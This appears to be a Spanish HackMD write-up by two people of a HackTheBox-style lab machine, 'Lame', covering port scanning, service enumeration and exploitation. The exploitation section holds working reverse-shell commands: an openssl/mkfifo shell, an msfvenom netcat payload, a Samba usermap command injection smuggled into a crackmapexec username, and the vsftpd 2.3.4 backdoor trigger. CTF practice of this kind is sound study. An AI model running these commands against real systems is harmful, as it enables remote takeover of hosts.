LAME - HackMD

# LAME [TOC] ## RECON Marc: Primeros pasos, enumero los puertos. Lo hago con triple verbose por poder ver los puertos abiertos y poder seguir haciendo el recon y no esperar a que finalize el escaneo de puertos. `nmap -p- --open --min-rate 5000 -Pn -n -vvv 10.10.10.3` Enumero los puertos de forma individualizada y lo primero es mirar la version del servicio y buscar exploits con searchsploit. `searchsploit Samba 3.0.20-Debian` `searchsploit vsftpd 2.3.4` `searchsploit OpenSSH 4.7p1` Aunque haya el exploit y veo que hay los puertos 22,445 es hacer si me puedo logear como usuario anonimo o por session nulla. `crackmapexec smb 10.10.10.3 -u '' -p '' --shares` Carlos: `nmap -p- --open -sS --min-rate 5000 -Pn -n -vvv 10.10.10.3 -oG ports.gp` `nmap -p21,22,139,445,3632 -sV --min-rate 5000 -sC -Pn -n -vvv 10.10.10.3 -oN scan.txt` `searchsploit Samba 3.0.20-Debian` `searchsploit vsftpd 2.3.4` `searchsploit OpenSSH 4.7p1` ## Explotacion Marc: exploit de https://0x00sec.org/t/cvexplained-cve-2007-2447/22748 // NO HA FUNCIONADO revese shell por ssl ```bash= user@attack$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes user@attack$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242 or user@attack$ ncat --ssl -vv -l -p 4242 user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s ``` Carlos: > METODO 1: > `msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.5 LPORT=443 -f python` https://gist.githubusercontent.com/joenorton8014/19aaa00e0088738fc429cff2669b9851/raw/6e1ae37e0061be103fd733b16266d26379a7f4ba/samba-usermap-exploit.py ('traduci el script a py3') `python3 samba-usermap-exploit.py 10.10.10.3` > METODO 2: Attacker > `nc -lnvp 1234` ```crackmapexec smb 10.10.10.3 -u "/=\`nohup rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 1234 >/tmp/f\`" -p ""``` > METODO 3 (fallido): http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523 `telnet 10.10.10.3 21` `USER hacker:)` ( ES NECESARIO EL ':)' PARA QUE FUNCIONE EL EXPLOIT ) `PASS letmein` `telnet 10.10.10.3 6200` ## Post-Explotacion Como el servicio lo corre el servicio root y al ser un rce ejecutamos comandos como root, entonces tenemos acceso como root directamente.